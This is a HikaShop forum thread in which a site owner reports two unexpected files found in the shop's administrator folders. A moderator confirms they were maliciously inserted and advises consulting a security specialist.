File Insertion

Start
Prev
1
Next
End

saejangracer
Topic Author
Offline

Posts: 25
Thank you received: 2

8 years 6 months ago #256871

-- HikaShop version -- : 2.6.4

Hi Hikashop,

Have recently discovered 2 Hikashop files modified on my site but not by me:

1. /administrator/components/com_hikashop/extensions/mail.php
I checked the last backup and this file didn't exist in this location. The content of the file is a PHP code to upload, move and rename a file.

2. /administrator/components/com_hikashop/extensions/plg_hikashop_massaction_category/indexa.html
I deleted this file because it contains a URL to a malware source file.

What should I do with the mail.php file? Is it a legitimate hikashop file in the right place, or was it maliciously inserted?

Also does this mean there's an open vulnerability in Hikashop 2.6.4 for the insertion to happen?

Thank you =)

Site building and troubleshooting
www.hikashop.com/forum/product-category-...product-display.html (open)

Please Log in or Create an account to join the conversation.

nicolas
Away

Posts: 83932
Thank you received: 13588
MODERATOR

8 years 6 months ago #256886

Hi,

Both of these files don't exist by default in HikaShop.
So they were indeed maliciously inserted.
Does that mean that there is an open vulnerability on your website ? It's highly likely yes. Maybe you updated your extensions/Joomla in the mean time and that vulnerability has been closed already. The best would be to contact a security specialist like aesecure in order to check on it.
Does that mean that there is an open vulnerability on HikaShop 2.6.4 ? Not at all. It could be, but in that case, it would likely have already been reported and fixed, and many other websites would have been infected, especially ours.
So far, we had only one security issue reported and fixed in 7 years (and it was a few years ago). We try really hard to code in a secure way.

Please Log in or Create an account to join the conversation.